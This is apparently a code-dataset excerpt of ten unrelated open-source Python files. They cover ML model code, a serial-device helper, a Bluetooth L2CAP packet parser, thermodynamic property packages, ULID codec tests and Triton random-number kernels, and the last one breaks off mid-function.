max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
python/cuml/test/test_prims.py
|
Nicholas-7/cuml
| 2,743 |
117391
|
<gh_stars>1000+
# Copyright (c) 2019-2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from cuml.prims.label import make_monotonic
from cuml.prims.label import invert_labels
from cuml.prims.label import check_labels
from cuml.test.utils import array_equal
import pytest
import cupy as cp
import numpy as np
@pytest.mark.parametrize("arr_type", ["np", "cp"])
@pytest.mark.parametrize("dtype", [cp.int32, cp.int64])
@pytest.mark.parametrize("copy", [True, False])
def test_monotonic_validate_invert_labels(arr_type, dtype, copy):
arr = np.array([0, 15, 10, 50, 20, 50], dtype=dtype)
original = arr.copy()
if arr_type == "cp":
arr = cp.asarray(arr, dtype=dtype)
arr_orig = arr.copy()
monotonic, mapped_classes = make_monotonic(arr, copy=copy)
cp.cuda.Stream.null.synchronize()
assert array_equal(monotonic, np.array([0, 2, 1, 4, 3, 4]))
# We only care about in-place updating if data is on device
if arr_type == "cp":
if copy:
assert array_equal(arr_orig, arr)
else:
assert array_equal(arr, monotonic)
wrong_classes = cp.asarray([0, 1, 2], dtype=dtype)
val_labels = check_labels(monotonic, classes=wrong_classes)
cp.cuda.Stream.null.synchronize()
assert not val_labels
correct_classes = cp.asarray([0, 1, 2, 3, 4], dtype=dtype)
val_labels = check_labels(monotonic, classes=correct_classes)
cp.cuda.Stream.null.synchronize()
assert val_labels
if arr_type == "cp":
monotonic_copy = monotonic.copy()
inverted = invert_labels(monotonic,
classes=cp.asarray([0, 10, 15, 20, 50],
dtype=dtype), copy=copy)
cp.cuda.Stream.null.synchronize()
if arr_type == "cp":
if copy:
assert array_equal(monotonic_copy, monotonic)
else:
assert array_equal(monotonic, arr_orig)
assert array_equal(inverted, original)
|
neural_parts/models/__init__.py
|
naynasa/neural_parts_fork
| 137 |
117392
|
<gh_stars>100-1000
import torch
try:
from radam import RAdam
except ImportError:
pass
from .flexible_primitives import FlexiblePrimitivesBuilder, \
train_on_batch as train_on_batch_with_flexible_primitives, \
validate_on_batch as validate_on_batch_with_flexible_primitives
class OptimizerWrapper(object):
def __init__(self, optimizer, aggregate=1):
self.optimizer = optimizer
self.aggregate = aggregate
self._calls = 0
def zero_grad(self):
if self._calls == 0:
self.optimizer.zero_grad()
def step(self):
self._calls += 1
if self._calls == self.aggregate:
self._calls = 0
self.optimizer.step()
def optimizer_factory(config, parameters):
"""Based on the provided config create the suitable optimizer."""
optimizer = config.get("optimizer", "Adam")
lr = config.get("lr", 1e-3)
momentum = config.get("momentum", 0.9)
weight_decay = config.get("weight_decay", 0.0)
if optimizer == "SGD":
return OptimizerWrapper(
torch.optim.SGD(parameters, lr=lr, momentum=momentum,
weight_decay=weight_decay),
config.get("aggregate", 1)
)
elif optimizer == "Adam":
return OptimizerWrapper(
torch.optim.Adam(parameters, lr=lr, weight_decay=weight_decay),
config.get("aggregate", 1)
)
elif optimizer == "RAdam":
return OptimizerWrapper(
RAdam(parameters, lr=lr, weight_decay=weight_decay),
config.get("aggregate", 1)
)
else:
raise NotImplementedError()
def build_network(config, weight_file=None, device="cpu"):
network, train_on_batch, validate_on_batch = get_network_with_type(config)
network.to(device)
# Check whether there is a weight file provided to continue training from
if weight_file is not None:
network.load_state_dict(
torch.load(weight_file, map_location=device)
)
return network, train_on_batch, validate_on_batch
def get_network_with_type(config):
network_type = config["network"]["type"]
if network_type == "flexible_primitives":
network = FlexiblePrimitivesBuilder(config).network
train_on_batch = train_on_batch_with_flexible_primitives
validate_on_batch = validate_on_batch_with_flexible_primitives
else:
raise NotImplementedError()
return network, train_on_batch, validate_on_batch
|
utils/clean_json5.py
|
rw1nkler/prjxray
| 583 |
117445
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
import pyjson5
import simplejson
import sys
def main():
simplejson.dump(pyjson5.load(sys.stdin), sys.stdout, indent=2)
if __name__ == "__main__":
main()
|
inference/centernet.py
|
donnyyou/centerX
| 350 |
117457
|
<reponame>donnyyou/centerX<filename>inference/centernet.py
import torch
import torch.nn as nn
from typing import List
import cv2
from .utils import batch_padding
from modeling.backbone import build_backbone
from modeling.layers import *
__all__ = ["CenterNet"]
class CenterNet(nn.Module):
"""
Implement CenterNet (https://arxiv.org/abs/1904.07850).
"""
def __init__(self, cfg):
super().__init__()
self.device = torch.device(cfg.MODEL.DEVICE)
self.cfg = cfg
# fmt: off
self.num_classes = cfg.MODEL.CENTERNET.NUM_CLASSES
# fmt: on
self.backbone = build_backbone(cfg)
self.upsample = CenternetDeconv(cfg)
self.head = CenternetHead(cfg)
self.mean, self.std = cfg.MODEL.PIXEL_MEAN, cfg.MODEL.PIXEL_STD
pixel_mean = torch.Tensor(cfg.MODEL.PIXEL_MEAN).to(self.device).view(3, 1, 1)
pixel_std = torch.Tensor(cfg.MODEL.PIXEL_STD).to(self.device).view(3, 1, 1)
self.normalizer = lambda x: (x - pixel_mean) / pixel_std
self.to(self.device)
@torch.no_grad()
def _forward(self, batch_images):
features = self.backbone(batch_images)
up_fmap = self.upsample(features)
pred_dict = self.head(up_fmap)
return pred_dict
@torch.no_grad()
def inference_on_images(self, images: List, K=100, max_size=512):
batch_images,params = self._preprocess(images, max_size)
pred_dict = self._forward(batch_images)
heat, wh, reg = pred_dict['cls'], pred_dict['wh'], pred_dict['reg']
batch, cat, height, width = heat.size()
bboxes,scores,clses = CenterNetDecoder.decode(heat, wh , reg, K=K)
clses = clses.view(batch, K)
scores = scores.view(batch, K)
results = []
for i,param in zip(range(batch),params):
scale_x, scale_y = param['width'] / float(param['resized_width']), \
param['height'] / float(param['resized_height'])
bboxes[i, :, 0::2] = bboxes[i, :, 0::2] * scale_x * self.cfg.MODEL.CENTERNET.DOWN_SCALE
bboxes[i, :, 1::2] = bboxes[i, :, 1::2] * scale_y * self.cfg.MODEL.CENTERNET.DOWN_SCALE
# import cv2
# image = images[i]
# for j,bbox in enumerate(bboxes[i]):
# if scores[i][j] > 0.1:
# cv2.rectangle(image,(bbox[0],bbox[1]),(bbox[2],bbox[3]),(0,255,0),2)
# cv2.imwrite('result.jpg',image)
# import pdb; pdb.set_trace()
# result.pred_boxes = Boxes(bboxes[i])
# result.scores = scores[i]
# result.pred_classes = clses[i]
# results.append({"instances": result})
result = {'cls': clses[i],
'bbox': bboxes[i],
'scores': scores[i]}
results.append(result)
return results
def _preprocess(self, images: List, max_size=512):
"""
Normalize, pad and batch the input images.
"""
batch_images = []
params = []
for image in images:
old_size = image.shape[0:2]
ratio = min(float(max_size) / (old_size[i]) for i in range(len(old_size)))
new_size = tuple([int(i * ratio) for i in old_size])
resize_image = cv2.resize(image, (new_size[1], new_size[0]))
params.append({'width': old_size[1],
'height': old_size[0],
'resized_width': new_size[1],
'resized_height':new_size[0]
})
batch_images.append(resize_image)
batch_images = [torch.as_tensor(img.astype("float32").transpose(2, 0, 1)) \
for img in batch_images]
batch_images = [img.to(self.device) for img in batch_images]
batch_images = [self.normalizer(img/255.) for img in batch_images]
batch_images = batch_padding(batch_images, 32)
return batch_images, params
def build_model(cfg):
model = CenterNet(cfg)
return model
|
cvzone/SerialModule.py
|
mulakkalfaizal/cvzone
| 412 |
117463
|
"""
Serial Module
Uses "pySerial" Package
By: Computer Vision Zone
Website: https://www.computervision.zone/
"""
import serial
import time
import logging
import serial.tools.list_ports
class SerialObject:
"""
Allow to transmit data to a Serial Device like Arduino.
Example send $255255000
"""
def __init__(self, portNo=None, baudRate=9600, digits=1):
"""
Initialize the serial object.
:param portNo: Port Number.
:param baudRate: Baud Rate.
:param digits: Number of digits per value to send
"""
self.portNo = portNo
self.baudRate = baudRate
self.digits = digits
connected = False
if self.portNo is None:
ports = list(serial.tools.list_ports.comports())
for p in ports:
if "Arduino" in p.description:
print(f'{p.description} Connected')
self.ser = serial.Serial(p.device)
self.ser.baudrate = baudRate
connected = True
if not connected:
logging.warning("Arduino Not Found. Please enter COM Port Number instead.")
else:
try:
self.ser = serial.Serial(self.portNo, self.baudRate)
print("Serial Device Connected")
except:
logging.warning("Serial Device Not Connected")
def sendData(self, data):
"""
Send data to the Serial device
:param data: list of values to send
"""
myString = "$"
for d in data:
myString += str(int(d)).zfill(self.digits)
try:
self.ser.write(myString.encode())
return True
except:
return False
def getData(self):
"""
:param numOfVals: number of vals to retrieve
:return: list of data received
"""
data = self.ser.readline()
data = data.decode("utf-8")
data = data.split('#')
dataList = []
[dataList.append(d) for d in data]
return dataList[:-1]
def main():
arduino = SerialObject()
while True:
arduino.sendData([1, 1, 1, 1, 1])
time.sleep(2)
arduino.sendData([0, 0, 0, 0, 0])
time.sleep(2)
if __name__ == "__main__":
main()
|
kedro/pipeline/__init__.py
|
daniel-falk/kedro
| 2,047 |
117466
|
"""``kedro.pipeline`` provides functionality to define and execute
data-driven pipelines.
"""
from .modular_pipeline import pipeline
from .node import node
from .pipeline import Pipeline
__all__ = ["pipeline", "node", "Pipeline"]
|
blesuite/replay/btsnoop/bt/l2cap.py
|
jreynders/BLESuite-1
| 198 |
117479
|
"""
Parse L2CAP packets
"""
import struct
from . import hci_acl
"""
Fixed channel ids for L2CAP packets
References can be found here:
* https://www.bluetooth.org/en-us/specification/adopted-specifications - Core specification 4.1
** [vol 3] Part A (Section 2.1) - Channel identifiers
"""
L2CAP_CID_NUL = 0x0000
L2CAP_CID_SCH = 0x0001
L2CAP_CID_ATT = 0x0004
L2CAP_CID_LE_SCH = 0x0005
L2CAP_CID_SMP = 0x0006
L2CAP_CHANNEL_IDS = {
L2CAP_CID_NUL : "L2CAP CID_NUL",
L2CAP_CID_SCH : "L2CAP CID_SCH",
L2CAP_CID_ATT : "L2CAP CID_ATT",
L2CAP_CID_LE_SCH : "L2CAP CID_LE_SCH",
L2CAP_CID_SMP : "L2CAP CID_SMP"
}
def parse_hdr(data):
"""
Parse L2CAP packet
0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7
-----------------------------------------------------------------
| length | channel id |
-----------------------------------------------------------------
L2CAP is packet-based but follows a communication model based on channels.
A channel represents a data flow between L2CAP entities in remote devices.
Channels may be connection-oriented or connectionless. Fixed channels
other than the L2CAP connectionless channel (CID 0x0002) and the two L2CAP
signaling channels (CIDs 0x0001 and 0x0005) are considered connection-oriented.
All L2CAP layer packet fields shall use Little Endian byte order with the exception of the
information payload field. The endian-ness of higher layer protocols encapsulated within
L2CAP information payload is protocol-specific
References can be found here:
* https://www.bluetooth.org/en-us/specification/adopted-specifications - Core specification 4.1
** [vol 3] Part A (Section 3) - Data Packet Format
Returns a tuple of (length, cid, data)
"""
length, cid = struct.unpack("<HH", data[:4])
data = data[4:]
return length, cid, data
"""
Codes and names for L2CAP Signaling Protocol
"""
L2CAP_SCH_PDUS = {
0x01 : "SCH Command reject",
0x02 : "SCH Connection request",
0x03 : "SCH Connection response",
0x04 : "SCH Configure request",
0x05 : "SCH Configure response",
0x06 : "SCH Disconnection request",
0x07 : "SCH Disconnection response",
0x08 : "SCH Echo request",
0x09 : "SCH Echo response",
0x0a : "SCH Information request",
0x0b : "SCH Information response",
0x0c : "SCH Create Channel request",
0x0d : "SCH Create Channel response",
0x0e : "SCH Move Channel request",
0x0f : "SCH Move Channel response",
0x10 : "SCH Move Channel Confirmation",
0x11 : "SCH Move Channel Confirmation response",
0x12 : "LE SCH Connection_Parameter_Update_Request",
0x13 : "LE SCH Connection_Parameter_Update_Response",
0x14 : "LE SCH LE_Credit_Based_Connection Request",
0x15 : "LE SCH LE_Credit_Based_Connection Response",
0x16 : "LE SCH LE_Flow_Control_Credit",
}
def parse_sch(l2cap_data):
"""
Parse the signaling channel data.
The signaling channel is a L2CAP packet with channel id 0x0001 (L2CAP CID_SCH)
or 0x0005 (L2CAP_CID_LE_SCH)
0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7
-----------------------------------------------------------------
| code | id | length |
-----------------------------------------------------------------
References can be found here:
* https://www.bluetooth.org/en-us/specification/adopted-specifications - Core specification 4.1
** [vol 3] Part A (Section 4) - Signaling Packet Formats
Returns a tuple of (code, id, length, data)
"""
code, id, length = struct.unpack("<BBH", l2cap_data[:4])
return (code, id, length, l2cap_data[4:])
PKT_TYPE_PARSERS = { hci_acl.PB_START_NON_AUTO_L2CAP_PDU : parse_hdr,
hci_acl.PB_CONT_FRAG_MSG : parse_hdr,
hci_acl.PB_START_AUTO_L2CAP_PDU : parse_hdr,
hci_acl.PB_COMPLETE_L2CAP_PDU : parse_hdr }
def parse(l2cap_pkt_type, data):
"""
Convenience method for switching between parsing methods based on type
"""
parser = PKT_TYPE_PARSERS[l2cap_pkt_type]
if parser is None:
raise ValueError("Illegal L2CAP packet type")
return parser(data)
def cid_to_str(cid):
"""
Return a string representing the L2CAP channel id
"""
return L2CAP_CHANNEL_IDS[cid]
def sch_code_to_str(code):
"""
Return a string representing the signaling channel PDU
"""
return L2CAP_SCH_PDUS[code]
|
thermo/property_package_constants.py
|
RoryKurek/thermo
| 380 |
117506
|
<filename>thermo/property_package_constants.py
# -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2018, 2019 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
.. warning::
These classes were a first attempt at rigorous multiphase equilibrium.
They may be useful in some special cases but they are not complete and
further development will not happen. They were never documented as well.
It is recommended to switch over to the :obj:`thermo.flash` interface
which seeks to be more modular, easier to maintain and extend,
higher-performance, and easier to modify.
'''
from __future__ import division
__all__ = ['PropertyPackageConstants', 'IDEAL_PKG', 'NRTL_PKG', 'UNIFAC_PKG',
'UNIFAC_DORTMUND_PKG', 'PR_PKG', 'SRK_PKG']
from fluids.numerics import brenth, ridder, derivative, numpy as np
from chemicals.utils import log, exp
from fluids.constants import R, pi, N_A
from chemicals.identifiers import IDs_to_CASs
from chemicals.rachford_rice import flash_inner_loop
from thermo.eos_mix import PRMIX, SRKMIX
from thermo.eos import PR, SRK
from thermo.chemical import Chemical
from thermo.mixture import Mixture
from thermo.property_package import *
IDEAL_PKG = 'Ideal'
NRTL_PKG = 'NRTL'
UNIFAC_PKG = 'Unifac'
UNIFAC_DORTMUND_PKG = 'Unifac Dortmund'
PR_PKG = 'PR'
SRK_PKG = 'SRK'
property_packages = [IDEAL_PKG, NRTL_PKG, UNIFAC_PKG, UNIFAC_DORTMUND_PKG,
PR_PKG, SRK_PKG]
property_packages_cubic = [PR_PKG, SRK_PKG]
property_package_to_eos = {PR_PKG: PRMIX, SRK_PKG: SRKMIX}
property_package_to_eos_pures = {PR_PKG: PR, SRK_PKG: SRK}
property_package_names_to_objs = {IDEAL_PKG: IdealCaloric,
NRTL_PKG: Nrtl, # Not complete - enthalpy missing
UNIFAC_PKG: UnifacCaloric,
UNIFAC_DORTMUND_PKG: UnifacDortmundCaloric,
PR_PKG: GceosBase,
SRK_PKG: GceosBase,
}
class PropertyPackageConstants(object):
'''Class to store kijs, as well as allow properties to be edited; load
them from the database and then be ready to store them.
'''
def __init__(self, mixture, name=IDEAL_PKG, **kwargs):
if isinstance(mixture, list):
self.CASs = IDs_to_CASs(mixture)
self.Chemicals = [Chemical(CAS) for CAS in self.CASs]
elif isinstance(mixture, Mixture):
self.Chemicals = mixture.Chemicals
self.name = name
if name not in property_packages_cubic:
eos_mix = PRMIX
eos = PR
else:
eos_mix = property_package_to_eos[name]
eos = property_package_to_eos_pures[name]
self.eos = eos
self.eos_mix = eos_mix
self.eos_in_a_box = [eos_mix]
self.pkg_obj = property_package_names_to_objs[self.name]
self.set_chemical_constants()
self.set_Chemical_property_objects()
self.set_TP_sources()
self.kwargs = kwargs
self.pkg = self.new_package()
def new_package(self):
pkg_args = {'VaporPressures': self.VaporPressures,
'Tms': self.Tms, 'Tbs': self.Tbs, 'Tcs': self.Tcs,
'Pcs': self.Pcs, 'omegas': self.omegas, 'VolumeLiquids': self.VolumeLiquids,
'HeatCapacityLiquids': self.HeatCapacityLiquids,
'HeatCapacityGases': self.HeatCapacityGases,
'EnthalpyVaporizations': self.EnthalpyVaporizations,
'VolumeLiquids': self.VolumeLiquids,
'VolumeGases': self.VolumeGases,
'eos': self.eos, 'eos_mix': self.eos_mix,
'MWs': self.MWs,
'atomss': self.atomss,
'Hfs': self.Hfgms,
'Gfs': self.Gfgms,
}
pkg_args.update(self.kwargs)
if self.name == UNIFAC_PKG:
pkg_args['UNIFAC_groups'] = self.UNIFAC_groups
elif self.name == UNIFAC_DORTMUND_PKG:
pkg_args['UNIFAC_groups'] = self.UNIFAC_Dortmund_groups
return self.pkg_obj(**pkg_args)
def from_json(self, json):
self.__dict__.update(json)
self.set_Chemical_property_objects()
self.set_TP_sources()
transfer_methods = ['set_chemical_constants', 'set_Chemical_property_objects',
'set_TP_sources', 'UNIFAC_Dortmund_groups', 'UNIFAC_groups',
'atomss']
try:
for method in transfer_methods:
attr = Mixture.__dict__[method]
setattr(PropertyPackageConstants, method, attr)
except:
for method in transfer_methods:
setattr(PropertyPackageConstants, method, getattr(Mixture, method))
|
tests/test_codec.py
|
xkortex/ulid
| 303 |
117534
|
<reponame>xkortex/ulid
"""
test_codec
~~~~~~~~~~
Tests for the :mod:`~ulid.codec` module.
"""
import datetime
import time
import pytest
from ulid import base32, codec, ulid
UNSUPPORTED_TIMESTAMP_TYPE_EXC_REGEX = (r'Expected datetime, int, float, str, memoryview, Timestamp'
r', ULID, bytes, or bytearray')
TIMESTAMP_SIZE_EXC_REGEX = r'Expects timestamp to be 48 bits'
UNSUPPORTED_RANDOMNESS_TYPE_EXC_REGEX = r'Expected int, float, str, memoryview, Randomness, ULID, bytes, or bytearray'
RANDOMNESS_SIZE_EXC_REGEX = r'Expects randomness to be 80 bits'
@pytest.fixture(scope='session', params=[
list,
dict,
set,
tuple,
type(None)
])
def unsupported_type(request):
"""
Fixture that yields types that a cannot be converted to a timestamp/randomness.
"""
return request.param
@pytest.fixture(scope='session', params=[bytes, bytearray, memoryview])
def buffer_type(request):
"""
Fixture that yields types that support the buffer protocol.
"""
return request.param
def test_decode_timestamp_datetime_returns_timestamp_instance():
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given Unix time from epoch in seconds as an :class:`~datetime.datetime`.
"""
value = datetime.datetime.now()
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert int(instance.timestamp) == int(value.timestamp())
def test_decode_timestamp_int_returns_timestamp_instance():
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given Unix time from epoch in seconds as an :class:`~int`.
"""
value = int(time.time())
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert int(instance.timestamp) == value
def test_decode_timestamp_float_returns_timestamp_instance():
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given Unix time from epoch in seconds as a :class:`~float`.
"""
value = float(time.time())
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert int(instance.timestamp) == int(value)
def test_decode_timestamp_str_returns_timestamp_instance(valid_bytes_48):
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given timestamp as a :class:`~str`.
"""
value = base32.encode_timestamp(valid_bytes_48)
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert instance.str == value
def test_decode_timestamp_bytes_returns_timestamp_instance(buffer_type, valid_bytes_48):
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given timestamp as an object that supports the buffer protocol.
"""
value = buffer_type(valid_bytes_48)
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert instance.bytes == value
def test_decode_timestamp_timestamp_returns_timestamp_instance(valid_bytes_48):
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given timestamp as a :class:`~ulid.ulid.Timestamp`.
"""
value = ulid.Timestamp(valid_bytes_48)
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert instance == value
def test_decode_timestamp_ulid_returns_timestamp_instance(valid_bytes_128):
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given timestamp as a :class:`~ulid.ulid.ULID`.
"""
value = ulid.ULID(valid_bytes_128)
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert instance == value.timestamp()
def test_decode_timestamp_with_unsupported_type_raises(unsupported_type):
"""
Assert that :func:`~ulid.codec.decode_timestamp` raises a :class:`~ValueError` when given
a type it cannot compute a timestamp value from.
"""
with pytest.raises(ValueError) as ex:
codec.decode_timestamp(unsupported_type())
assert ex.match(UNSUPPORTED_TIMESTAMP_TYPE_EXC_REGEX)
def test_decode_timestamp_with_incorrect_size_bytes_raises(valid_bytes_128):
"""
Assert that :func:`~ulid.codec.decode_timestamp` raises a :class:`~ValueError` when given
a type that cannot be represented as exactly 48 bits.
"""
with pytest.raises(ValueError) as ex:
codec.decode_timestamp(valid_bytes_128)
assert ex.match(TIMESTAMP_SIZE_EXC_REGEX)
def test_decode_randomness_int_returns_randomness_instance(valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as an :class:`~int`.
"""
value = int.from_bytes(valid_bytes_80, byteorder='big')
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance.int == value
def test_decode_randomness_float_returns_randomness_instance(valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as an :class:`~float`.
"""
value = float(int.from_bytes(valid_bytes_80, byteorder='big'))
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance.int == int(value)
def test_decode_randomness_str_returns_randomness_instance(valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as an :class:`~str`.
"""
value = base32.encode_randomness(valid_bytes_80)
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance.str == value
def test_decode_randomness_bytes_returns_randomness_instance(buffer_type, valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as an object that supports the buffer protocol.
"""
value = buffer_type(valid_bytes_80)
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance.bytes == value
def test_decode_randomness_randomness_returns_randomness_instance(valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as a :class:`~ulid.ulid.Randomness`.
"""
value = ulid.Randomness(valid_bytes_80)
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance == value
def test_decode_randomness_ulid_returns_randomness_instance(valid_bytes_128):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as a :class:`~ulid.ulid.ULID`.
"""
value = ulid.ULID(valid_bytes_128)
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance == value.randomness()
def test_decode_randomness_with_unsupported_type_raises(unsupported_type):
"""
Assert that :func:`~ulid.codec.decode_randomness` raises a :class:`~ValueError` when given
a type it cannot compute a randomness value from.
"""
with pytest.raises(ValueError) as ex:
codec.decode_randomness(unsupported_type())
assert ex.match(UNSUPPORTED_RANDOMNESS_TYPE_EXC_REGEX)
def test_decode_randomness_with_incorrect_size_bytes_raises(valid_bytes_128):
"""
Assert that :func:`~ulid.codec.decode_randomness` raises a :class:`~ValueError` when given
a type that cannot be represented as exactly 80 bits.
"""
with pytest.raises(ValueError) as ex:
codec.decode_randomness(valid_bytes_128)
assert ex.match(RANDOMNESS_SIZE_EXC_REGEX)
|
python/triton/language/random.py
|
h-vetinari/triton
| 146 |
117541
|
import triton
from . import core as tl
PHILOX_KEY_A: tl.constexpr = -1640531527 # 0x9E3779B9
PHILOX_KEY_B: tl.constexpr = -1150833019 # <KEY>
PHILOX_ROUND_A: tl.constexpr = -766435501 # 0xD2511F53
PHILOX_ROUND_B: tl.constexpr = -845247145 # 0xCD9E8D57
N_ROUNDS_DEFAULT = 10 # Default number of rounds for philox
# -------------------
# randint
# -------------------
@triton.jit
def philox_impl(c0, c1, c2, c3, k0, k1, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Run `n_rounds` rounds of Philox for state (c0, c1, c2, c3) and key (k0, k1).
"""
for _ in range(n_rounds):
# update random state
A = PHILOX_ROUND_A
B = PHILOX_ROUND_B
_c0, _c2 = c0, c2
c0 = tl.umulhi(B, _c2) ^ c1 ^ k0
c2 = tl.umulhi(A, _c0) ^ c3 ^ k1
c1 = B * _c2
c3 = A * _c0
# raise key
k0 = k0 + PHILOX_KEY_A
k1 = k1 + PHILOX_KEY_B
return c0, c1, c2, c3
@triton.jit
def philox(seed, c0, c1, c2, c3, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
seed = seed.to(tl.uint64)
seed_hi = ((seed >> 32) & 0xffffffff).to(tl.uint32)
seed_lo = (seed & 0xffffffff).to(tl.uint32)
return philox_impl(c0, c1, c2, c3, seed_lo, seed_hi, n_rounds)
@triton.jit
def randint(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block, returns a single
block of random :code:`int32`.
If you need multiple streams of random numbers,
using `randint4x` is likely to be faster than calling `randint` 4 times.
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
ret, _, _, _ = randint4x(seed, offset, n_rounds)
return ret
@triton.jit
def randint4x(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block, returns four
blocks of random :code:`int32`.
This is the maximally efficient entry point
to Triton's Philox pseudo-random number generator.
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
# _0 = tl.zeros(offset.shape, offset.dtype)
_0 = offset * 0
return philox(seed, offset, _0, _0, _0, n_rounds)
# -------------------
# rand
# -------------------
# @triton.jit
# def uint32_to_uniform_float(x):
# """
# Numerically stable function to convert a random uint32 into a random float uniformly sampled in [0, 1).
# """
# two_to_the_minus_32: tl.constexpr = 2.328306e-10
# return x * two_to_the_minus_32
@triton.jit
def uint32_to_uniform_float(x):
"""
Numerically stable function to convert a random uint32 into a random float uniformly sampled in [0, 1).
"""
x = x.to(tl.int32, bitcast=True)
max = 4.656613e-10 # = 1/MAX_INT = 1/2147483647.
x = tl.where(x < 0, -x - 1, x)
return x * max
@triton.jit
def rand(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a block of random :code:`float32` in :math:`U(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
offset = offset.to(tl.uint32, bitcast=True)
source = randint(seed, offset, n_rounds)
return uint32_to_uniform_float(source)
@triton.jit
def rand4x(seed, offsets, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offsets` block,
returns a 4 blocks of random :code:`float32` in :math:`U(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
offsets = offsets.to(tl.uint32, bitcast=True)
i1, i2, i3, i4 = randint4x(seed, offsets, n_rounds)
u1 = uint32_to_uniform_float(i1)
u2 = uint32_to_uniform_float(i2)
u3 = uint32_to_uniform_float(i3)
u4 = uint32_to_uniform_float(i4)
return u1, u2, u3, u4
# -------------------
# randn
# -------------------
@triton.jit
def pair_uniform_to_normal(u1, u2):
"""Box-Muller transform"""
u1 = tl.maximum(1.0e-7, u1)
